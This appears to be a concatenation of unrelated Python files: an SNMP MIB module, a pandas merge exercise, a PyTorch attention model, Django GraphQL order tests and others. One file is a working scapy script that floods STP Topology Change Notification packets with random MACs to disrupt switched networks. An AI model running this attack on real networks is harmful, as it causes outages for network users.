if mibBuilder.loadTexts: aptisHdlcChannelTransmitDrops.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTransmitDrops.setDescription('Number of transmitted frames dropped on the HDLC channel.')
aptisHdlcChannelTransmitUnderflows = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelTransmitUnderflows.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTransmitUnderflows.setDescription('Number of transmit underflows on the HDLC channel.')
aptisHdlcChannelTransmitBuffer = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelTransmitBuffer.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTransmitBuffer.setDescription('HDLC channel transmit buffer size.')
mibBuilder.exportSymbols("APTIS-HDLC-MIB", aptisHdlcChannelRcvOverruns=aptisHdlcChannelRcvOverruns, aptisHdlcChannelIfIndex=aptisHdlcChannelIfIndex, aptisHdlcChannelRcvFCSErrors=aptisHdlcChannelRcvFCSErrors, aptisHdlcFramingErrors=aptisHdlcFramingErrors, aptisHdlcChannelRcvFrames=aptisHdlcChannelRcvFrames, aptisHdlcTransmitDrops=aptisHdlcTransmitDrops, aptisHdlcChannelTransmitUnderflows=aptisHdlcChannelTransmitUnderflows, aptisHdlcReceiveDrops=aptisHdlcReceiveDrops, aptisHdlcChannelTable=aptisHdlcChannelTable, aptisHdlcChannelTransmitOctets=aptisHdlcChannelTransmitOctets, aptisHdlcChannelTransmitBuffer=aptisHdlcChannelTransmitBuffer, aptisHdlcChannelTransmitFrames=aptisHdlcChannelTransmitFrames, aptisHdlcChannelRcvDrops=aptisHdlcChannelRcvDrops, aptisHdlcChannelTransmitDrops=aptisHdlcChannelTransmitDrops, aptisHdlcChannelEntry=aptisHdlcChannelEntry, aptisHdlcChannelRcvMaxPacket=aptisHdlcChannelRcvMaxPacket, aptisHdlcFCSErrors=aptisHdlcFCSErrors, aptisHdlcParityErrors=aptisHdlcParityErrors, aptisHdlcEntry=aptisHdlcEntry, Index=Index, aptisHdlcChannelStatus=aptisHdlcChannelStatus, aptisHdlcReceiveOverruns=aptisHdlcReceiveOverruns, aptisHdlc=aptisHdlc, aptisHdlcIfIndex=aptisHdlcIfIndex, aptisHdlcTransmitUnderflows=aptisHdlcTransmitUnderflows, aptisHdlcChannelRcvOctets=aptisHdlcChannelRcvOctets, aptisHdlcSysErrors=aptisHdlcSysErrors, aptisHdlcAborts=aptisHdlcAborts, aptisHdlcChannelRcvAborts=aptisHdlcChannelRcvAborts, aptisHdlcChannelRcvByteAlign=aptisHdlcChannelRcvByteAlign, aptisHdlcTable=aptisHdlcTable)
| python |
from datetime import datetime
from validator.kube.resource import KubernetesResourceProvider
from validator.base import ClusterResult
from validator.namespace import validate_namespaces
def run_validate(host, token):
provider = KubernetesResourceProvider(host, token)
ns = validate_namespaces(provider)
now = datetime.now()
return ClusterResult(ns, now)
| python |
#!/usr/bin/env python
# coding: utf-8
# # Coding Exercises (Part 1)
# ## Full Data Workflow A-Z: Merging, Joining, Concatenating
# ### Exercise 12: Merging, joining, aligning and concatenating Data
# Now, you will have the opportunity to analyze your own dataset. <br>
# __Follow the instructions__ and insert your code! You are either requested to
# - Complete the Code and __Fill in the gaps__. Gaps are marked with "__---__" and are __placeholders__ for your code fragment.
# - Write Code completely __on your own__
# In some exercises, you will find questions that can only be answered, if your code is correct and returns the right output! The correct answer is provided below your coding cell. There you can check whether your code is correct.
# If you need a hint, check the __Hints Section__ at the end of this Notebook. Exercises and Hints are numerated accordingly.
# If you need some further help or if you want to check your code, you can also check the __solutions notebook__.
# ### Have Fun!
# --------------------------------------------------------------------------------------------------------------
# ## Option 1: Self_guided
# ### Concatenating DataFrames vertically
# __Import__ the cars dataset (with cars from usa and europe) from the csv-file __cars_clean.csv__. <br>
# Also __import__ the csv-file __cars_jap.csv__ (with cars from japan) and __concatenate__ both DataFrames __vertically__! <br>
# __Save__ the __concatenated DataFrame__ in the variable __cars_all__! <br>
# Finally, __sort__ cars_all by the model_year from __low to high__!
# ### Left Join
# __Import__ the csv-files __summer.csv__ (as summer) and __dictionary.csv__ (as dic) which contains the __full country name__ for the olympic country codes as well as __population__ and __gdp__ statistics for some countries.<br>
#
# __"Copy and paste"__ the __full country name__, __population__ and __gdp__ from the dic DataFrame __into the summer DataFrame__ with a __Left Join__!<br>
# __Save__ the new merged DataFrame in the variable __summer_new__!<br>
#
# __Inspect__ summer_new and determine the __olympic country codes__ for which the dic DataFrame does __not provide__ any information!
# ### Arithmetic operations between DataFrames / Alignment
# __Import__ the csv-files __ath_2008.csv__ and __ath_2012.csv__ with all medals winners in the Sport __Athletics__ in the Editions __2008__ and __2012__.
# For __all Athletes__ in the two DataFrames, __aggregate/add__ the total number of __Gold__, __Silver__ and __Bronze__ Medals over both editions! __Save__ the aggregated DataFrame in the variable __add__. (Hint: add should contain an index with the Athlete names and three columns, Gold, Silver, Bronze)
# __Sort__ add by Gold, Silver, Bronze from __high to low__! Change datatype to __integer__, if necessary! The first Athlete in your DataFrame should be ... no surprise ... Usain Bolt with 6 Gold and 0 Silver and Bronze Medals.
# -------------------------------------
# ## Option 2: Guided and Instructed
# # STOP HERE, IF YOU WANT TO DO THE EXERCISE ON YOUR OWN!
# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# In[ ]:
#run the cell
import pandas as pd
# ### Concatenating DataFrames vertically
# In[ ]:
#run the cell
cars = pd.read_csv("cars_clean.csv")
# __Inspect__ the __cars__ DataFrame!
# In[ ]:
#run the cell
cars.head()
# In[ ]:
#run the cell
cars.tail()
# In[ ]:
#run the cell
cars.info()
# __Inspect__ the cars_jap DataFrame!
# In[ ]:
#run the cell
cars_jap = pd.read_csv("cars_jap.csv")
# In[ ]:
#run the cell
cars_jap.head()
# Before we can concatenate both DataFrames, we need to __align__ them!<br>
# 108. __Insert__ the column __origin__ to __cars_jap__ at the most appropriate position! __Fill in the gaps!__
# In[ ]:
cars_jap.insert(7, "origin", "japan")
# Also the column labels should match. <br>
# 109. __Overwrite__ the column labels in __cars_jap__ and use the same column labels that we have in cars!
# In[ ]:
cars_jap.columns = cars.columns
# __Inspect__!
# In[ ]:
#run the cell
cars_jap.head()
# 110. __Concatenate__ both DataFrames __vertically__ and create a __new RangeIndex__! __Save__ the new DataFrame in the variable __cars_all__!
# In[ ]:
cars_all = pd.concat([cars, cars_jap], ignore_index= True)
# __Inspect__!
# In[ ]:
#run the cell
cars_all.head()
# In[ ]:
#run the cell!
cars_all.tail()
# 111. __Sort cars_call__ by the __model_year__ from __low to high__! Create a __new RangeIndex__ (drop the old)! __Fill in the gaps__!
# In[ ]:
cars_all = cars_all.sort_values("model_year").reset_index(drop = True)
# __Inspect__!
# In[ ]:
#run the cell
cars_all.head()
# In[ ]:
#run the cell
cars_all.tail()
# In[ ]:
#run the cell
cars_all.info()
# ----------------------------------------------------------------------
# ### Left Join
# In[ ]:
# run the cell!
summer = pd.read_csv("summer.csv")
# __Inspect__ the __summer__ DataFrame!
# In[ ]:
# run the cell!
summer.head()
# In[ ]:
# run the cell!
dic = pd.read_csv("dictionary.csv")
# __Inspect__ dict!
# In[ ]:
# run the cell!
dic.head()
# __dic__ contains the Olympic Games __Country Codes__ ("Code") with the corresponding __full country names__ ("Country") as well as recent __Population__ and __GDP__ statistics.<br>
# 112. __Create__ the columns __Country__, __Population__ and __GDP per Capita__ in the __summer__ DataFrame by using a __Left Join__ with __pd.merge()__. <br>
# __Save__ the merged Dataframe in the variable __summer_new__! __Fill in the gaps__!
# In[ ]:
summer_new = pd.merge(summer, dic, how = "left", left_on= "Country", right_on = "Code")
# __Inspect__ summer_new!
# In[ ]:
# run the cell!
summer_new.head()
# In[ ]:
# run the cell!
summer_new.info()
# Apparently, __dic__ does __not contain__ additional information for __all olympic country codes__ that are in the __summer__ Dataframe.
# 113. __Filter__ summer_new for the elements in the column __Country_x__, where the __corresponding value__ in the column __Code__ is __missing__! <br>
# __Count__ the frequency! __Fill in the gaps__!
# In[ ]:
summer_new.loc[summer_new.Code.isnull(), "Country_x"].value_counts()
# For these country codes, we need to find __other sources__ for additional information on the __full country name__, __population__ and __gdp__ (most of these countries do not exist any more.) -> BONUS EXERCISE ;-)
# --------------------------
# ### Arithmetic operations between DataFrames / Alignment
# In[ ]:
#run the cell
ath_2008 = pd.read_csv("ath_2008.csv")
ath_2012 = pd.read_csv("ath_2012.csv")
# __Inspect__ the __ath_2008__ DataFrame. It contains all athletes who won medals in __Athletics__ in the Edition __2008__.
# In[ ]:
#run the cell
ath_2008.head()
# In[ ]:
#run the cell
ath_2008.info()
# __Inspect__ the __ath_2012__ DataFrame. It contains all athletes who won medals in __Athletics__ in the Edition __2012__.
# In[ ]:
#run the cell
ath_2012.head()
# In[ ]:
#run the cell
ath_2012.info()
# For __all Athletes__ in the two DataFrames, __aggregate/add__ the total number of __Gold__, __Silver__ and __Bronze__ Medals over both editions! __Save__ the aggregated DataFrame in the variable __add__!
# 114. First, __set__ the __Athlete__ column as the __index__ in both DataFrames! __Save__ the changes!
# In[ ]:
ath_2008.set_index("Athlete", inplace= True)
# In[ ]:
ath_2012.set_index("Athlete", inplace= True)
# 115. __Add__ both DataFrames with the __most appropriate method__! __Save__ the resulting DataFrame in the variable __add__!
# In[ ]:
add = ath_2008.add(ath_2012, fill_value=0)
# __Inspect__!
# In[ ]:
#run the cell
add.head(10)
# 116. __Sort__ the athletes by the number of __Gold__, __Silver__ and __Bronze__ medals from __high to low__!<br>
# __Fill in the gaps!__ Who is the top athlete?
# In[ ]:
add = add.sort_values(["Gold", "Silver", "Bronze"], ascending = False).astype("int")
# In[ ]:
# run the cell!
add.head()
# In[ ]:
# run the cell!
add.tail()
# No surprise, it´s Usain Bolt!
# # Well Done!
# ------------------------------------------------
# # Hints (Spoiler!)
# 108. insert() method, index pos. 7
# 109. columns attribute
# 110. pd.concat() method, ignore index
# 111. methods sort_values() and reset_index()
# 112. left DataFrame: summer, on "Country" and "Code"
# 113. methods isnull() and value_counts()
# 114. set_index() method
# 115. add() method, fill_value = 0
# 116. pass a list of columns to sort_values() method (sequence matters!)
| python |
# Incorrect order
a = 5
b = 5
print(c)
c = 6 | python |
# -*- coding: utf-8 -*-
from scapy.layers.l2 import Dot3, LLC, STP
from scapy.all import sendp, RandMAC
# --------------------------------------------------------------------------
# STP TCN ATTACK
# --------------------------------------------------------------------------
def run(inter):
"""
This function launch STP TCN ATTACK
:param inter: interface to be launched the attack
:type inter: str
"""
interface = str(inter[0])
if len(interface) > 0:
try:
while 1:
# dst=Ethernet Multicast address used for spanning tree protocol
srcMAC = str(RandMAC()) # Random MAC in each iteration
p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x80) # TCN packet
pkt = p_ether/p_llc/p_stp # STP packet structure
sendp(pkt, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def run_attack(config):
""" This function is used for launch the STP TCN attack
:param config: GlobalParameters option instance
:type config: `GlobalParameters`
"""
run(config.interface)
| python |
# define self-attention
# simply modify the code for this paper A Structured Self-Attentive Sentence Embedding
class StructuredSelfAttention(torch.nn.Module):
def __init__(self, batch_size, lstm_hid_dim, d_a, r, max_len, emb_dim=128, vocab_size=None,
use_pretrained_embeddings = False, embeddings=None, type=1, n_classes = 4, bidirectional=True):
"""
Initializes parameters
Args:
batch_size : {int} batch_size used for training
lstm_hid_dim: {int} hidden dimension for lstm
d_a : {int} hidden dimension for the dense layer
r : {int} attention-hops or attention heads
max_len : {int} number of lstm timesteps
emb_dim : {int} embeddings dimension
vocab_size : {int} size of the vocabulary
use_pretrained_embeddings: {bool} use or train your own embeddings
embeddings : {torch.FloatTensor} loaded pretrained embeddings
type : [0,1] 0-->binary_classification 1-->multiclass classification
n_classes : {int} number of classes
Returns:
self
Raises:
Exception
"""
super(StructuredSelfAttention,self).__init__()
self.emb_dim = emb_dim
self.embeddings= nn.Embedding(vocab_size, emb_dim)
self.lstm = torch.nn.LSTM(emb_dim, lstm_hid_dim, 1, batch_first=True, bidirectional=True)
if bidirectional:
self.bi_num=2
else:
self.bi_num=1
self.linear_first = torch.nn.Linear(self.bi_num*lstm_hid_dim, d_a)
self.linear_first.bias.data.fill_(0)
self.linear_second = torch.nn.Linear(d_a, r)
self.linear_second.bias.data.fill_(0)
self.n_classes = n_classes
self.linear_final = torch.nn.Linear(self.bi_num*lstm_hid_dim, self.n_classes)
self.batch_size = batch_size
self.max_len = max_len
self.lstm_hid_dim = lstm_hid_dim
self.hidden_state = self.init_hidden()
self.r = r
self.type = type
def softmax(self, input, axis=1):
input_size = input.size()
trans_input = input.transpose(axis, len(input_size)-1)
trans_size = trans_input.size()
input_2d = trans_input.contiguous().view(-1, trans_size[-1])
soft_max_2d = F.softmax(input_2d)
soft_max_nd = soft_max_2d.view(*trans_size)
return soft_max_nd.transpose(axis, len(input_size)-1)
def init_hidden(self):
return (Variable(torch.zeros(2,self.batch_size,self.lstm_hid_dim).cuda()),
Variable(torch.zeros(2,self.batch_size,self.lstm_hid_dim).cuda()))
def forward(self, x):
embeddings = self.embeddings(x)
outputs, self.hidden_state = self.lstm(embeddings, self.hidden_state)
x = F.tanh(self.linear_first(outputs))
x = self.linear_second(x)
x = self.softmax(x, 1)
attention = x.transpose(1, 2)
sentence_embeddings = attention@outputs
avg_sentence_embeddings = torch.sum(sentence_embeddings,1)/self.r
if not bool(self.type):
output = F.sigmoid(self.linear_final(avg_sentence_embeddings))
return output, attention
else:
return F.log_softmax(self.linear_final(avg_sentence_embeddings)), attention # run this
#Regularization
def l2_matrix_norm(self, m):
"""
Frobenius norm calculation
"""
return torch.sum(torch.sum(torch.sum(m**2,1),1)**0.5).type(torch.DoubleTensor).cuda()
| python |
from django.test import override_settings
from django.utils import timezone
from hotels.models import HotelRoomReservation
from pretix.exceptions import PretixError
from pytest import mark
def test_cannot_create_order_unlogged(graphql_client, user, conference, mocker):
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
... on CreateOrderResult {
paymentUrl
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [
{
"ticketId": "1",
"attendeeName": "ABC",
"attendeeEmail": "[email protected]",
"variation": "1",
"answers": [{"questionId": "1", "value": "Example"}],
}
],
"hotelRooms": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert response["errors"][0]["message"] == "User not logged in"
@override_settings(FRONTEND_URL="http://test.it")
def test_calls_create_order(graphql_client, user, conference, mocker):
graphql_client.force_login(user)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
create_order_mock.return_value.payment_url = "https://example.com"
create_order_mock.return_value.code = "123"
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
... on CreateOrderResult {
paymentUrl
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [
{
"ticketId": "1",
"attendeeName": "ABC",
"attendeeEmail": "[email protected]",
"variation": "1",
"answers": [{"questionId": "1", "value": "Example"}],
}
],
"hotelRooms": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["paymentUrl"] == (
"https://example.com?return_url=http://test.it/en/orders/123/confirmation"
)
create_order_mock.assert_called_once()
@override_settings(FRONTEND_URL="http://test.it")
def test_handles_payment_url_set_to_none(graphql_client, user, conference, mocker):
graphql_client.force_login(user)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
# this happens when the order is free
create_order_mock.return_value.payment_url = None
create_order_mock.return_value.code = "123"
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
... on CreateOrderResult {
paymentUrl
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [
{
"ticketId": "1",
"attendeeName": "ABC",
"attendeeEmail": "[email protected]",
"variation": "1",
"answers": [{"questionId": "1", "value": "Example"}],
}
],
"hotelRooms": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["paymentUrl"] == (
"http://test.it/en/orders/123/confirmation"
)
create_order_mock.assert_called_once()
def test_handles_errors(graphql_client, user, conference, mocker):
graphql_client.force_login(user)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
create_order_mock.side_effect = PretixError("Example")
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [
{
"attendeeName": "ABC",
"attendeeEmail": "[email protected]",
"ticketId": "1",
"variation": "1",
}
],
"hotelRooms": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["message"] == "Example"
create_order_mock.assert_called_once()
@override_settings(FRONTEND_URL="http://test.it")
@mark.django_db
def test_order_hotel_room(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
create_order_mock.return_value.payment_url = "https://example.com"
create_order_mock.return_value.code = "123"
room = hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
... on CreateOrderResult {
paymentUrl
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-01",
"checkout": "2020-01-10",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["paymentUrl"] == (
"https://example.com?return_url=http://test.it/en/orders/123/confirmation"
)
reservation = HotelRoomReservation.objects.filter(room=room).first()
assert reservation.user == user
assert reservation.checkin == timezone.datetime(2020, 1, 1).date()
assert reservation.checkout == timezone.datetime(2020, 1, 10).date()
create_order_mock.assert_called_once()
def test_cannot_order_hotel_room_with_checkin_before_conference(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2019-01-01",
"checkout": "2019-01-10",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Invaild check-in date"
create_order_mock.assert_not_called()
def test_cannot_order_hotel_room_with_checkin_after_conference(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-20",
"checkout": "2020-01-22",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Invaild check-in date"
create_order_mock.assert_not_called()
def test_cannot_order_hotel_room_with_checkout_after_conference(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-02",
"checkout": "2020-01-22",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Invaild check-out date"
create_order_mock.assert_not_called()
def test_cannot_order_hotel_room_with_checkout_before_the_checkin(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-03",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Invaild check-out date"
create_order_mock.assert_not_called()
def test_cannot_order_room_with_random_room_id(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": "94990540",
"checkin": "2020-01-05",
"checkout": "2020-01-03",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Room 94990540 not found"
create_order_mock.assert_not_called()
def test_cannot_order_sold_out_room(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(conference=conference, total_capacity=0)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-03",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == f"Room {room.id} is sold out"
create_order_mock.assert_not_called()
def test_cannot_order_room_of_a_different_conference(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(total_capacity=5)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-03",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == f"Room {room.id} not found"
create_order_mock.assert_not_called()
def test_cannot_buy_more_room_than_available(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
create_order_mock.return_value.payment_url = "https://example.com"
create_order_mock.return_value.code = "123"
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
room = hotel_room_factory(conference=conference, total_capacity=2)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-06",
},
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-06",
},
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-06",
},
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Too many rooms"
create_order_mock.assert_not_called()
| python |
import io
import cv2
import fs
import fs.memoryfs
import numpy as np
import matplotlib.pyplot as plt
class ramp4():
"""
INTRODUCTION
------------
A simple library to make mp4 movies with matplotlib.pyplot. It use RAM instead of disk storage for the temporary images.
HOW TO USE
-----------
1) Get an instance of ramp4.
2) Add image with matplotlib using the 'add' method.
3) Render the movie using the 'render' method.
4) Done
"""
def __init__(self):
self.cpt = 1
self.mem = fs.memoryfs.MemoryFS()
def add(self, figure=None, dpi=150):
"""
Add the following image to the movie. The image has to be previously generated with matplotlib.pyplot using pyplot method or OOP.
Parameters:
-----------
fig : None or matplotlib.pyplot.figure
If matplotlib.pyplot OOP is used then put the figure object in this parameter.
If None is provided, the matplotlib.pyplot's method 'pyplot.savefig' will be use to get the byte of the image.
